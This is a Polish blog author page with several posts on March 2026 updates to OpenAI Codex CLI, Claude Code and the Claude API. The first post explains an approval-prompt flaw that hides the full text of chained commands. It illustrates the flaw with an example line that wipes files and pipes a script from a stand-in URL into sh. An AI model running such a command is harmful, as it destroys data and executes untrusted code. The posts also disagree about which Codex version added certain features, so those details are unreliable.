Autor: Franczeska

  • OpenAI Codex CLI 0.115.0 wprowadza błędne prośby o zatwierdzenie wśród nowych funkcji

    OpenAI Codex CLI 0.115.0 wprowadza błędne prośby o zatwierdzenie wśród nowych funkcji

    Ostatnia aktualizacja narzędzia CLI OpenAI Codex, wersja 0.115.0, miała być krokiem naprzód. Użytkownicy spodziewali się płynniejszego logowania i lepszego zarządzania wtyczkami. Zamiast tego wielu z nich zetknęło się z irytującym regresem: wszechobecnymi, często błędnymi prośbami o zatwierdzenie (approval prompts) niemal każdego polecenia. Ta usterka postawiła pod znakiem zapytania praktyczność nowych funkcji i podkreśliła wyzwania związane z zachowaniem równowagi między bezpieczeństwem a płynnością pracy.

    Nowe funkcje kontra stary problem: regresja w prośbach o zatwierdzenie

    Wersja 0.115.0 CLI faktycznie przyniosła kilka oczekiwanych usprawnień. Jednym z nich jest wsparcie dla logowania przez device code do ChatGPT, co ma uprościć proces uwierzytelniania. Kolejna nowość to płynniejsza konfiguracja wtyczek – system może teraz sam podpowiadać ich instalację. Dodano także hook userpromptsubmit, który pozwala deweloperom na blokowanie lub modyfikację promptów przed ich wykonaniem.

    Problem w tym, że aby w ogóle skorzystać z tych nowości, użytkownicy musieli najpierw przebrnąć przez ścianę pytań o zgodę. Jak zgłaszali deweloperzy, CLI nagle zaczęło domagać się zatwierdzenia rutynowych, podstawowych poleceń systemowych, takich jak find, ls czy sed. To komendy, które w poprzednich wersjach wykonywały się w tle, bez ingerencji użytkownika. Nagła zmiana to klasyczny przykład regresji – sytuacja, w której wprowadzenie nowego kodu psuje istniejącą, działającą funkcjonalność.

    Sytuacja była na tyle uciążliwa, że niektórzy użytkownicy celowo wracali do starszej, stabilnej wersji, aby odzyskać produktywność. Co gorsza, problem nie został naprawiony od razu i przeniósł się nawet do następnego wydania. Pokazuje to, jak trudno czasem wyeliminować nieoczekiwane konsekwencje zmian w kodzie.

    Poważniejsza wada: niepełne informacje w interfejsie zatwierdzania

    Sam fakt częstych pytań mógłby być jedynie irytujący. Okazało się jednak, że mechanizm zatwierdzania w wersji 0.115.0 ma poważniejszą, potencjalnie niebezpieczną wadę. Interfejs pokazywał użytkownikowi do recenzji tylko początkową część polecenia. Szczególnie problematyczne okazywało się to w przypadku poleceń łączonych za pomocą operatora &&.

    Wyobraźmy sobie sytuację: Codex prosi o zatwierdzenie wykonania cd katalog. Użytkownik, widząc tylko tę nieszkodliwą komendę, wyraża zgodę. Tymczasem w tle, niewidoczne w oknie zatwierdzenia, czekało pełne, złożone polecenie, np. cd katalog && rm -rf ./* && curl http://niebezpieczny-url.pl | sh. Użytkownik w dobrej wierze zatwierdzał prostą operację, nie mając pojęcia, co tak naprawdę zostanie uruchomione.

    Jako obejście sugerowano… unikanie zatwierdzania poleceń, których nie można w pełni przejrzeć. To rozwiązanie przerzuca odpowiedzialność za bezpieczeństwo na użytkownika, nie naprawiając podstawowej usterki interfejsu.

    Wpływ na użytkowników i adopcję nowych funkcji

    Wpływ na użytkowników i adopcję nowych funkcji

    Połączenie tych dwóch problemów – częstych próśb i niepełnych informacji – stworzyło wyjątkowo frustrujące środowisko pracy. Główny cel aktualizacji, czyli wprowadzenie nowych, użytecznych funkcji, został skutecznie przyćmiony. Użytkownik chcący przetestować nowy flow logowania czy zarządzania wtyczkami musiał w kółko klikać „zatwierdź”, często działając po omacku, bo nie widział pełnej treści polecenia.

    Ta regresja uderza w samą istotę narzędzi takich jak Codex CLI, które mają przyspieszać i automatyzować pracę dewelopera. Zamiast płynnej współpracy z AI, użytkownik otrzymywał ciągłe przerwy w pracy, zmuszony do ręcznej interwencji przy każdej, nawet najprostszej operacji. Jeden z użytkowników zgłosił, że problemy z zatwierdzaniem zmusiły go do skomplikowanych zmian w workflow i wzmocniły obawy o stabilność całego narzędzia Codex.

    Dla OpenAI to cenna, choć bolesna lekcja. Wprowadzanie nowych zabezpieczeń i funkcji musi iść w parze z dbałością o podstawową ergonomię. Jeśli nowy system zatwierdzania jest tak uciążliwy, że użytkownicy masowo wracają do starszej wersji, to znak, że równowaga między bezpieczeństwem a wygodą została zachwiana.

    Perspektywy naprawy i wnioski na przyszłość

    Perspektywy naprawy i wnioski na przyszłość

    Późniejsze aktualizacje zaczęły adresować te problemy. Poprawki obejmowały m.in. zapewnienie, że raz nadane uprawnienia są trwałe pomiędzy kolejnymi krokami (tzw. turns) oraz że system poprawnie działa z konfiguracjami opartymi na odrzuceniu (reject-style). To pokazuje, że zespół był świadomy problemu i pracował nad jego rozwiązaniem.

    Kluczowy wniosek z tej sytuacji dotyczy procesu wdrażania. Nowe funkcje, nawet te najbardziej obiecujące, muszą być testowane w realnych warunkach pod kątem ich wpływu na całościowe User Experience. Mechanizm zatwierdzania, który ma chronić, nie może być jednocześnie tak wadliwy, że wprowadza nowe ryzyko przez brak przejrzystości.

    Dla społeczności deweloperów używających Codex CLI to też przypomnienie o zachowaniu ostrożności. Korzystanie z wersji nightly czy świeżo wydanych aktualizacji, zwłaszcza w przypadku kluczowych narzędzi, zawsze wiąże się z ryzykiem. Czasem kilka dni zwłoki z aktualizacją, by poczekać na pierwsze opinie społeczności, może zaoszczędzić wiele godzin frustracji.

    Podsumowanie

    Historia wersji 0.115.0 OpenAI Codex CLI to studium przypadku na temat wyzwań w rozwoju złożonego oprogramowania. Z jednej strony mamy ewidentny postęp: lepsze uwierzytelnianie, sprytniejsze zarządzanie wtyczkami, nowe hooki dla deweloperów. Z drugiej – poważny krok w tył w fundamentalnej kwestii interakcji z użytkownikiem.

    Usterka z zatwierdzaniem poleceń nie tylko uprzykrzała życie, ale wręcz podważała zaufanie do systemu, obnażając jego potencjalnie niebezpieczną wadę. Naprawienie tego wymagało nie tylko poprawki technicznej, ale i przywrócenia poczucia kontroli oraz przejrzystości dla osób pracujących w terminalu. Ostatecznie sukces takich narzędzi nie zależy wyłącznie od ich możliwości, ale od tego, jak płynnie i bezpiecznie wpisują się w codzienną pracę. Wersja 0.115.0, przynajmniej na początku, tę płynność skutecznie zablokowała.

  • Claude Code 2.1.79: Nowa Flaga –console, Zdalne Sterowanie VS Code i Ogromne Skoki Wydajności

    Claude Code 2.1.79: Nowa Flaga –console, Zdalne Sterowanie VS Code i Ogromne Skoki Wydajności

    Wersja 2.1.79 Claude Code, wydana w marcu 2026 roku, to kolejny solidny krok w rozwoju tego popularnego narzędzia do kodowania wspomaganego przez AI. Tym razem zespół Anthropic skupił się na trzech kluczowych obszarach: uproszczeniu procesu uwierzytelniania, rozszerzeniu możliwości zdalnej pracy z Visual Studio Code oraz na znaczących poprawkach wydajnościowych, które odczują wszyscy użytkownicy. To nie są kosmetyczne zmiany, ale realne ulepszenia wpływające na codzienny komfort i efektywność pracy.

    Dla społeczności web developmentu, AI i DevOps, gdzie szybkość, stabilność i płynna integracja narzędzi są kluczowe, ta aktualizacja ma konkretne znaczenie. Ułatwia start z API, otwiera nowe możliwości współpracy i po prostu działa szybciej oraz stabilniej.

    Uproszczone Uwierzytelnianie: Flaga --console dla Szybszego Startu

    Jedną z największych barier we wdrożeniu nowego narzędzia bywa skomplikowana konfiguracja. W Claude Code 2.1.79 problem ten rozwiązuje nowa flaga CLI: --console. Jej zadanie jest proste, ale niezwykle użyteczne – pozwala na bezpośrednie logowanie do usługi Anthropic Console w celu autoryzacji rozliczeń API.

    • Jak to działa? Zamiast ręcznego kopiowania kluczy API czy konfigurowania zmiennych środowiskowych, deweloper może teraz uruchomić claude --console. Uruchomi to proces, który przeprowadzi go przez uwierzytelnienie za pośrednictwem znanej konsoli Anthropic. Dla zespołów wdrażających Claude Code w środowiskach deweloperskich czy w ramach większych projektów AI to duże ułatwienie. Zmniejsza ryzyko błędów konfiguracyjnych i skraca czas potrzebny na rozpoczęcie pracy.

    To rozwiązanie wpisuje się w szerszy trend "vibe coding", gdzie chodzi o minimalizację oporów między pomysłem a jego implementacją. Im mniej czasu spędzasz na skomplikowanej konfiguracji, tym szybciej możesz skupić się na pisaniu kodu z pomocą AI.

    Zdalne Sterowanie VS Code: Most Między Terminalem a Przeglądarką

    Prawdziwą perełką tej aktualizacji jest wzmocnienie funkcji Remote Control, aktywowanej przez polecenie /remote-control. Jej koncepcja jest prosta: tworzy most między lokalną sesją terminalową Claude Code a instancją VS Code działającą w przeglądarce.

    • Po co to komu? Wyobraź sobie sytuację, w której pracujesz na zdalnym serwerze poprzez SSH, ale chcesz skorzystać z pełnoprawnego, wygodnego edytora VS Code ze wszystkimi wtyczkami. Albo gdy chcesz szybko podzielić się kontekstem swojej sesji kodowania z członkiem zespołu, nie wymagając od niego skomplikowanej konfiguracji lokalnej. Teraz jest to możliwe.

    Co nowego w wersji 2.1.79?

    • Szybsze, inteligentne tytuły sesji: AI generuje opisowy tytuł sesji zdalnej w ciągu kilku sekund od pierwszej wiadomości, a następnie aktualizuje go po trzeciej, co ułatwia zarządzanie wieloma aktywnymi sesjami.
    • Lepsza stabilność integracji: Wprowadzono poprawki zapewniające płynniejszą współpracę między terminalem a zdalnym VS Code.

    Dla deweloperów zajmujących się DevOps czy pracą w chmurze to potężne narzędzie. Pozwala na zachowanie lekkiego, terminalowego interfejsu Claude Code, jednocześnie dając dostęp do bogatego GUI edytora, gdy jest to potrzebne. To elastyczność w czystej postaci.

    Solidne Ulepszenia Wydajności: Szybciej, Lżej, Stabilniej

    Solidne Ulepszenia Wydajności: Szybciej, Lżej, Stabilniej

    Jeśli funkcje są sercem aplikacji, to wydajność jest jej kręgosłupem. Wersja 2.1.79 wprowadza tu kilka istotnych usprawnień, które są odczuwalne w codziennym użytkowaniu.

    Mniejszy Głód Pamięci przy Starcie

    Optymalizacja ładowania wtyczek to zawsze dobry kierunek. Teraz komendy, skille i agenci ładują się z cache na dysku, zamiast być ponownie pobieranymi za każdym razem. W praktyce przekłada się to na mniejsze zużycie pamięci RAM podczas uruchamiania Claude Code. W dobie wielozadaniowości, gdzie w tle działa Docker, kilka instancji Chrome i Slack, każdy zaoszczędzony megabajt ma znaczenie.

    Większa Stabilność Długich Zapytań (Non-Streaming)

    To zmiana, która ucieszy każdego, kto pracuje nad złożonymi zadaniami AI. Zwiększono limit tokenów dla zapytań typu "non-streaming fallback" z 21 tysięcy do 64 tysięcy. Do tego wydłużono timeout z 120 do 300 sekund dla połączeń lokalnych.

    • Co to oznacza? Kiedy Claude Code musi wysłać zapytanie w trybie niesekwencyjnym (np. gdy streaming zawiedzie), istnieje teraz znacznie mniejsze ryzyko, że odpowiedź zostanie przedwcześnie obcięta z powodu przekroczenia limitu. Dla deweloperów generujących długie fragmenty kodu, analizujących duże pliki czy korzystających z zaawansowanych zdolności agentowych AI, to ważna poprawka stabilności.

    Konfigurowalny Czas Oczekiwania na Stream

    Dodano także nową zmienną środowiskową: CLAUDE_STREAM_IDLE_TIMEOUT_MS (domyślnie 90 sekund). Pozwala ona skonfigurować, po jakim czasie bezczynności połączenie streamingowe ma zostać uznane za zawieszone i zamknięte. To techniczny detal, ale istotny dla zarządzania zasobami podczas długich, złożonych sesji kodowania.

    Dopracowanie Szczegółów: UI i Płynność Pracy

    Dopracowanie Szczegółów: UI i Płynność Pracy

    Poza dużymi funkcjami, aktualizacja przynosi szereg mniejszych, ale bardzo trafionych usprawnień interfejsu i workflow.

    • Przełącznik czasu trwania tury (turn duration toggle): Nowa opcja w UI pozwala włączyć wyświetlanie informacji o tym, ile czasu zajęło wygenerowanie odpowiedzi przez model. To świetne narzędzie do monitorowania wydajności podczas sesji "vibe coding" – wiesz, kiedy odpowiedź jest błyskawiczna, a kiedy model potrzebuje chwili namysłu.
    • Lepsze zarządzanie sesjami: Poprawiono nawigację i zarządzanie sesjami, w tym mechanizmy multi-seed i timeout, co zwiększa ogólną niezawodność.
    • Inteligentne przywracanie wprowadzania: Jeśli przerwiesz prompt (np. klawiszem Ctrl+C), zanim Claude zacznie odpowiadać, Twoje częściowo wprowadzone polecenie zostanie automatycznie przywrócone do edycji. Mała rzecz, a cieszy.
    • Lepsza odkrywalność trybu bash: Claude będzie teraz sugerował użycie prefiksu ! dla poleceń interaktywnych, ułatwiając nowym użytkownikom odkrycie tej przydatnej funkcji.

    Poprawiono też szereg błędów, w tym te związane z aktywacją trybu głosowego, aktualizacją nazw modeli i samym zdalnym sterowaniem.

    Dla Kogo Są Te Zmiany?

    Ta aktualizacja nie wprowadza rewolucyjnie nowych modeli AI, ale skupia się na fundamentach. Jest skrojona pod potrzeby profesjonalnych deweloperów:

    • Web deweloperzy docenią szybszy start i stabilność, zwłaszcza przy pracy z dużymi plikami konfiguracyjnymi czy generowaniu szablonów.
    • Inżynierowie AI/ML skorzystają na zwiększonych limitach tokenów dla złożonych zadań analitycznych czy generowania kodu.
    • Specjaliści DevOps i osoby pracujące ze zdalnymi serwerami znajdą w /remote-control nieocenione narzędzie do elastycznej pracy.
    • Zespoły wdrażające Claude Code na większą skalę ułatwią sobie życie dzięki fladze --console, redukując czas onboardingu.

    Podsumowanie: Dojrzałość i Skupienie na Deweloperze

    Wydanie Claude Code 2.1.79 to przykład dojrzałego rozwoju oprogramowania. Zamiast rzucać na rynek półprodukty, zespół skupia się na dopracowaniu tego, co już działa, i usunięciu punktów zapalnych. Uproszczenie uwierzytelniania, rozszerzenie zdalnej współpracy i fundamentalne poprawki wydajnościowe – każdy z tych elementów bezpośrednio przekłada się na lepsze doświadczenia użytkowników.

    W ekosystemie narzędzi do kodowania wspomaganego AI, gdzie konkurencja jest ogromna, takie solidne aktualizacje często mają większe znaczenie niż głośne premiery. Pokazują, że twórcy rozumieją prawdziwe problemy użytkowników i konsekwentnie nad nimi pracują. Dla społeczności, która codziennie używa Claude Code do budowania projektów, to po prostu dobra wiadomość.

  • Claude Code wprowadza Auto Mode. Koniec z klikaniem „Allow” przy każdej akcji

    Claude Code wprowadza Auto Mode. Koniec z klikaniem „Allow” przy każdej akcji

    Koniec z irytującym cyklem pytań i odpowiedzi. Jeśli używasz Claude Code do pomocy w programowaniu, znasz to dobrze: chcesz szybko stworzyć plik, uruchomić testy czy zainstalować zależność, a AI zatrzymuje się, czekając na Twoje pozwolenie. Ta „tarcza ochronna” ma zapobiegać błędom, ale często spowalnia pracę. Obecne podejście do zarządzania uprawnieniami w Claude Code opiera się na ręcznych wyborach użytkownika, a nie na automatycznym klasyfikatorze.

    Domyślne ustawienia Claude Code są celowo konserwatywne. Wymagają zatwierdzenia praktycznie każdego zapisu pliku i każdej komendy bash. Chroni to system, ale jednocześnie uniemożliwia automatyzację złożonych zadań i przerywa flow programisty.

    Z drugiej strony istnieje opcja --dangerously-skip-permissions. Jak sama nazwa wskazuje, jest ona niebezpieczna. Pomija wszystkie checki, oddając AI pełną kontrolę nad systemem. To jak zdjęcie kółek pomocniczych przed jazdą po bezdrożach.

    Obecne mechanizmy zarządzania uprawnieniami

    Obecnie Claude Code oferuje ręczny system zarządzania uprawnieniami. Przed wykonaniem akcji, takiej jak zapis pliku czy uruchomienie komendy w terminalu, użytkownik otrzymuje prompt z opcjami: zatwierdź jednorazowo (once), zatwierdź zawsze dla tej akcji (always) lub odrzuć (deny). Ustawienia te można konfigurować globalnie lub dla konkretnych projektów poprzez plik .claude/settings.local.json.

    Dla zaawansowanych scenariuszy, takich jak automatyzacja, dostępny jest również tryb headless, uruchamiany poleceniem claude -p. W tym trybie Claude Code działa bez interakcji z użytkownikiem, ale wymaga wcześniejszego skonfigurowania uprawnień.

    Anthropic podkreśla, że pomijanie mechanizmów bezpieczeństwa, choć zapewnia płynność, wiąże się z ryzykiem. Firma rekomenduje używanie takich funkcji w izolowanych środowiskach, na przykład w kontenerach Docker lub na wydzielonych maszynach wirtualnych, zwłaszcza podczas eksperymentów.

    Dla kogo jest to dostępne i jak to skonfigurować?

    Claude Code współpracuje z modelami takimi jak Claude 3.5 Sonnet oraz Claude 3 Opus.

    Konfiguracja uprawnień jest możliwa na kilka sposobów. W aplikacji desktopowej ustawienia można znaleźć w dedykowanej sekcji. W przypadku pracy w linii komend zarządzanie odbywa się poprzez polecenia konfiguracyjne i edycję plików ustawień. Dla programistów używających Visual Studio Code integracja odbywa się poprzez standardowe workflowy z narzędziami CLI.

    Co ważne, administratorzy dysponują narzędziami do zarządzania tymi ustawieniami w środowiskach zespołowych. Daje to kontrolę nad standardami bezpieczeństwa w większych organizacjach.

    W stronę bardziej intuicyjnej współpracy z AI

    W stronę bardziej intuicyjnej współpracy z AI

    Ewolucja zarządzania uprawnieniami w asystentach kodowania to istotny temat. Pierwsza generacja tych narzędzi często przypominała zdolnego, ale nieporadnego stażystę, który o wszystko musiał pytać. Zapewniało to bezpieczeństwo, ale kosztem wydajności.

    Przyszła generacja tych narzędzi może aspirować do roli kompetentnego partnera. Partnera, który rozumie kontekst, potrafi ocenić intencje użytkownika i efektywnie współpracować. Kluczowe będzie znalezienie równowagi między automatyzacją a niezawodnymi zabezpieczeniami.

    Nie oznacza to końca ludzkiej kontroli. Nadal to deweloper określa ogólny cel i kierunek. Nadal to on pisze prompty i weryfikuje końcowy efekt. Zmienia się natomiast warstwa interakcji – zamiast mikrozarządzania każdym krokiem, programista może skupić się na makrozadaniach, ufając, że narzędzia sprawnie zrealizują cel przy zachowaniu przejrzystych i solidnych zabezpieczeń.

    Czy to przyszłość asystentów programistycznych?

    Wprowadzenie bardziej zaawansowanych, a jednocześnie bezpiecznych mechanizmów zarządzania uprawnieniami wydaje się naturalnym krokiem ewolucyjnym. Kluczowe pytanie brzmi: jak skutecznie zbalansować płynność pracy z bezpieczeństwem?

    Skuteczność każdego przyszłego, bardziej autonomicznego systemu będzie zależała od jakości jego projektowania i precyzji logiki decyzyjnej. Błąd polegający na zablokowaniu bezpiecznej akcji będzie irytujący, ale dopuszczenie akcji ryzykownej może mieć poważne konsekwencje. Dlatego tak ważne jest, aby nowe funkcje były testowane w realistycznych, kontrolowanych warunkach.

    Dla społeczności deweloperskiej dążenie do większej swobody jest obiecujące. Daje szansę na prawdziwą płynność „vibe codingu”, gdzie dialog z AI przypomina bardziej burzę mózgów z kolegą z zespołu niż wypełnianie formalnego wniosku o każdą drobnostkę. Sukces w znalezieniu tej równowagi może zdefiniować nowy standard wygody i produktywności w narzędziach AI dla programistów.

  • OpenAI Codex 0.115.0: Pełna kontrola nad agentami i nowa inspekcja wizualna

    OpenAI Codex 0.115.0: Pełna kontrola nad agentami i nowa inspekcja wizualna

    Marzec 2026 przyniósł ważną aktualizację dla programistów korzystających z zaawansowanych systemów AI. OpenAI wydało Codex w wersji 0.115.0, skupiając się na dwóch kluczowych obszarach: lepszej kontroli nad zespołem agentów i rozszerzeniu możliwości wizualnych. To nie są kosmetyczne poprawki, lecz znaczące ulepszenia fundamentów platformy, która już teraz zdążyła zmienić podejście do tzw. agentowego kodowania (agentic coding).

    Wydanie przynosi pełną inspekcję obrazów w wysokiej rozdzielczości, inteligentniejsze procesy zatwierdzania zmian oraz nowy Python SDK do pracy z systemem plików. Dla użytkowników oznacza to płynniejszą, bardziej wydajną i po prostu sprawniejszą współpracę z AI.

    Inspekcja wizualna w pełnej rozdzielczości

    Jedną z najbardziej wyczekiwanych nowości jest pełna obsługa obrazów. Do tej pory analiza elementów wizualnych w workflow Codexa mogła mieć ograniczenia. Wersja 0.115.0 wprowadza natywne wsparcie dla funkcji view_image oraz codex.emitImage, pozwalając agentom na szczegółowe przeglądanie i analizę grafiki w wysokiej rozdzielczości.

    To ważne ulepszenie dla każdego, kto pracuje nad interfejsami użytkownika, grafiką generatywną czy aplikacjami przetwarzającymi materiały wizualne. Agent może teraz dokładnie „przyjrzeć się” mockupowi, diagramowi architektonicznemu czy zrzutowi ekranu i na tej podstawie podjąć trafniejsze decyzje dotyczące kodu lub sugerowanych zmian.

    Smart Approvals: Strażnicy bezpiecznego kodu

    Najciekawszym elementem nowej wersji jest system Smart Approvals. To rozwiązanie problemu, który pojawia się przy pracy z wieloma agentami działającymi równolegle – kwestii tego, kto i jak zatwierdza ich propozycje.

    OpenAI wprowadza koncepcję „subagentów-strażników” (guardian subagents). Ich rolą jest usprawnienie procesów code review. Zamiast ręcznego zatwierdzania każdej zmiany, deweloper może skonfigurować przepływ, w którym pewne typy modyfikacji – na przykład zmiany w kluczowych plikach konfiguracyjnych czy wrażliwych fragmentach kodu – są automatycznie kierowane do dedykowanego agenta-strażnika. Dokonuje on wstępnej weryfikacji przed przedstawieniem propozycji człowiekowi.

    Co ważne, poprawiono też dziedziczenie reguł piaskownicy (sandbox) dla subagentów, co zwiększa bezpieczeństwo całego systemu. Narzędzie wait_agent zostało również przemianowane dla zachowania spójności z spawn_agent i send_input.

    Nowy Python SDK i ulepszone sesje WebSocket

    Nowy Python SDK i ulepszone sesje WebSocket

    Dla deweloperów stawiających na automatyzację i integracje, nowy Python SDK do filesystem RPCs w wersji 2 to spora wygoda. Umożliwia on programowe wykonywanie operacji na plikach bezpośrednio z poziomu skryptów Pythona, co otwiera drogę do tworzenia zaawansowanych, zautomatyzowanych pipeline'ów z Codexem w roli głównej.

    Równolegle ulepszono sesje komunikacji w czasie rzeczywistym przez WebSocket. Dodano dedykowany tryb transkrypcji, ujednolicono konfigurację sesji pod kluczem [realtime] oraz wprowadzono możliwość płynnego przekazania sesji (handoff) w wersji 2 za pomocą narzędzia codex. To wszystko sprawia, że praca interaktywna z agentem staje się szybsza i mniej podatna na problemy z połączeniem.

    Ulepszenia dla deweloperów: JS REPL, TUI i integracje

    W codziennej pracy przydadzą się też mniejsze, ale istotne ulepszenia. Środowisko JS REPL (Read-Eval-Print Loop) zostało wzbogacone o dostęp do codex.cwd i codex.homeDir, a referencje do codex.tool(...) oraz codex.emitImage(...) są teraz trwale zachowywane między komórkami kodu. Pozwala to na budowanie bardziej złożonych i interaktywnych skryptów.

    Poprawiono także wydajność tekstowego interfejsu użytkownika (TUI) oraz samego JS REPL. Wprowadzono nowy przepływ wyszukiwania narzędzi (tool-search flow) w integracjach aplikacji, co ułatwia odkrywanie funkcjonalności. Współpraca z MCP (Model Context Protocol) i elicitation jest teraz bardziej odporna na błędy, a lokalne proxy lepiej obsługuje połączenia HTTP/1 CONNECT.

    Instalacja i środowisko wykonawcze

    Instalacja i środowisko wykonawcze

    Aktualizację do wersji 0.115.0 można zainstalować standardowo przez npm, komendą:

    $ npm install -g @openai/[email protected]

    Warto pamiętać, że Codex jest zoptymalizowany pod kątem pracy z zaawansowanymi modelami agentowymi OpenAI, takimi jak GPT-5.3-Codex (o oknie kontekstowym 272K tokenów) czy GPT-5.4 (aż 1M tokenów). Te modele, w przeciwieństwie do swoich wersji w ChatGPT, są specjalnie dostrojone do długich, wieloetapowych zadań programistycznych w środowisku CLI, aplikacji desktopowej czy rozszerzeń IDE.

    Pod maską Codex opiera się na solidnych fundamentach: plikach konfiguracyjnych config.toml, systemie piaskownic i zatwierdzeń, dokumentacji AGENTS.md oraz protokole MCP. Bezpieczeństwo na poziomie systemu operacyjnego zapewniają mechanizmy takie jak Seatbelt na macOS czy Landlock i seccomp na Linuxie.

    W kierunku stabilnej platformy agentowej

    Wydanie 0.115.0 to nie tylko nowe funkcje, ale także zestaw poprawek stabilizujących platformę. Przywrócono poprawne działanie codex exec --profile w zakresie przywracania ustawień profilu. Usprawniono normalizację nazw narzędzi w MCP, co zwiększa bezpieczeństwo, oraz zachowywanie parametrów tool_params w promptach. To drobne, ale istotne zmiany, które składają się na bardziej przewidywalne i niezawodne środowisko.

    Ta aktualizacja wpisuje się w szybki cykl rozwoju Codexa. Zaraz po niej, 20 marca, ukazała się wersja 0.116.0 z logowaniem przez kod urządzenia do ChatGPT, ulepszeniami pluginów i hookami na prompty użytkownika. Widać wyraźnie, że OpenAI traktuje Codex jako strategiczną platformę dla przyszłości programowania wspomaganego przez AI.

    Podsumowanie

    Codex v0.115.0 to krok w kierunku dojrzałej platformy do orkiestracji agentów AI. Nie chodzi już tylko o to, by AI napisało fragment kodu, ale o zarządzanie zespołem wyspecjalizowanych agentów, którzy bezpiecznie i pod nadzorem człowieka mogą realizować złożone zadania.

    Wprowadzenie Smart Approvals z guardian subagents, pełna inspekcja wizualna oraz nowy Python SDK to odpowiedź na realne potrzeby deweloperów wchodzących w erę programowania agentowego. Poprawki wydajnościowe i stabilizacyjne cementują pozycję Codexa jako profesjonalnego narzędzia. Wygląda na to, że centrum dowodzenia dla AI w software developmencie właśnie otrzymało potężny upgrade.

  • Claude Platform otrzymuje ważne aktualizacje: większa kontrola nad streamingiem i nowe pola w API

    Claude Platform otrzymuje ważne aktualizacje: większa kontrola nad streamingiem i nowe pola w API

    Platforma Claude od Anthropic właśnie zyskała dwie istotne, choć na pierwszy rzut oka dyskretne, nowości dla deweloperów. Chodzi o możliwość programistycznego sprawdzania możliwości modeli oraz większą kontrolę nad strumieniowaniem odpowiedzi w trybie rozszerzonego myślenia (extended thinking). To drobne, ale ważne zmiany, które ułatwiają budowanie bardziej przewidywalnych i wydajnych aplikacji.

    Zasadniczo, korzystając z API Claude, trzeba wiedzieć, z czym dokładnie ma się do czynienia – jakie limity tokenów obowiązują i które funkcje są wspierane. Do tej pory informacje te trzeba było sprawdzać w dokumentacji. Teraz można to zrobić bezpośrednio w kodzie.

    Nowe pola w Models API: max_input_tokens, max_tokens i capabilities

    Od 18 marca 2026 roku endpointy GET /v1/models oraz GET /v1/models/{model_id} zwracają trzy nowe pola. Są to max_input_tokens, max_tokens oraz obiekt capabilities. Co one oznaczają?

    max_input_tokens określa maksymalną liczbę tokenów, jaką model może przyjąć na wejściu w pojedynczym żądaniu. max_tokens to z kolei limit tokenów, które model może wygenerować w odpowiedzi. Najciekawszy jest jednak obiekt capabilities. Choć szczegóły nie zostały jeszcze szeroko opisane, można się spodziewać, że będzie on przechowywał informacje o tym, czy dany model obsługuje np. extended thinking, wizję czy konkretne narzędzia (tool use).

    To zmiana jakościowa dla deweloperów integrujących Claude'a. Zamiast ręcznie aktualizować konfigurację w kodzie przy każdym wydaniu nowego modelu, można napisać logikę, która dynamicznie odczyta jego możliwości bezpośrednio z API. W praktyce ułatwia to zarządzanie wersjami modeli i tworzenie bardziej odpornych na zmiany integracji.

    Kontrola nad streamingiem odpowiedzi z „myśleniem”: pole display

    Druga aktualizacja, z 16 marca, dotyczy trybu extended thinking. To funkcja, w której Claude, zamiast od razu podawać finalną odpowiedź, najpierw prezentuje swój tok rozumowania prowadzący do rozwiązania. Jest to niezwykle przydatne do debugowania i zrozumienia procesu, ale w niektórych aplikacjach produkcyjnych te dodatkowe dane mogą nie być potrzebne użytkownikowi końcowemu, a ich przesyłanie wydłuża czas uzyskania ostatecznej odpowiedzi.

    Teraz deweloperzy zyskują nad tym kontrolę. W żądaniu można ustawić parametr thinking.display: "omitted". W efekcie w strumieniowanej odpowiedzi bloki thinking będą przychodziły z pustą zawartością, ale ich sygnatura (struktura) zostanie zachowana. Dlaczego to ważne?

    Zachowanie struktury jest kluczowe dla ciągłości w rozmowach wieloturowych. Systemy, które analizują i przetwarzają odpowiedzi modelu w czasie rzeczywistym, często polegają na tej strukturze, aby odróżnić proces myślenia od finalnej odpowiedzi. Gdyby struktura uległa zmianie, mogłoby to zaburzyć logikę aplikacji. Teraz aplikacja może bezpiecznie pomijać treść myślenia przed użytkownikiem, zachowując jednocześnie pełną informację dla własnej logiki przetwarzania. Co istotne, sposób rozliczania za użycie modelu pozostaje bez zmian – płaci się zarówno za tokeny zużyte na myślenie, jak i na odpowiedź.

    Kontekst: potężne modele 4.6 i milion tokenów kontekstu

    Kontekst: potężne modele 4.6 i milion tokenów kontekstu

    Te techniczne aktualizacje API wpisują się w szerszy trend rozwoju Claude'a, który w 2026 roku przyspieszył. Flagowe modele, Claude Opus 4.6 i Claude Sonnet 4.6, oferują już kontekst miliona tokenów (1M) w wersji ogólnodostępnej (generally available). Oznacza to, że modele mogą analizować ogromne zbiory danych – na przykład całe bazy kodu liczące miliony linii, długie transkrypcje sądowe lub kompleksowe raporty due diligence.

    Wcześniej korzystanie z okna 1M tokenów wymagało specjalnego nagłówka beta. Od 13 marca dla Opus 4.6 i Sonnet 4.6 to ograniczenie zniesiono. Jeśli żądanie przekracza 200 tysięcy tokenów, system automatycznie użyje pełnego, milionowego kontekstu. Jednocześnie usunięto specjalne limity rate limits dla 1M tokenów, co oznacza, że obowiązują teraz standardowe limity konta.

    Co to oznacza dla deweloperów webowych i AI?

    Dla osób budujących aplikacje z użyciem AI, zwłaszcza w obszarach web developmentu, programowania czy DevOps, te zmiany mają konkretne przełożenie.

    Po pierwsze: większa przejrzystość i automatyzacja. Dynamiczne odczytywanie możliwości modeli pozwala na tworzenie systemów, które same dostosowują się do dostępnych funkcji. Można sobie wyobrazić aplikację, która sprawdza, czy wybrany model obsługuje wizję, i dopiero wtedy umożliwia przesyłanie obrazów. Albo system monitorujący, który wysyła alert, gdy prompt zbliża się do limitu max_tokens dla danego modelu.

    Po drugie: lepsze doświadczenie użytkownika w aplikacjach strumieniujących. Tryb thinking.display: "omitted" pozwala na szybsze dostarczenie użytkownikowi końcowemu finalnej, „czystej” odpowiedzi, szczególnie w chatbotach wsparcia czy interfejsach konwersacyjnych. W tle aplikacja nadal otrzymuje pełną strukturę, więc może logować proces myślenia do celów analitycznych lub używać go w kolejnych turach rozmowy, ale użytkownik nie musi na to czekać.

    Po trzecie: łatwiejsze zarządzanie kosztami i wydajnością. Wiedza o dokładnych limitach tokenów (max_input_tokens, max_tokens) pomaga precyzyjniej projektować prompty i przewidywać zużycie. Łącząc to z innymi nowościami, jak automatyczne buforowanie promptów (automatic caching), deweloperzy mogą budować wydajniejsze i tańsze w utrzymaniu aplikacje.

    Podsumowanie: ewolucja w kierunku platformy dla deweloperów

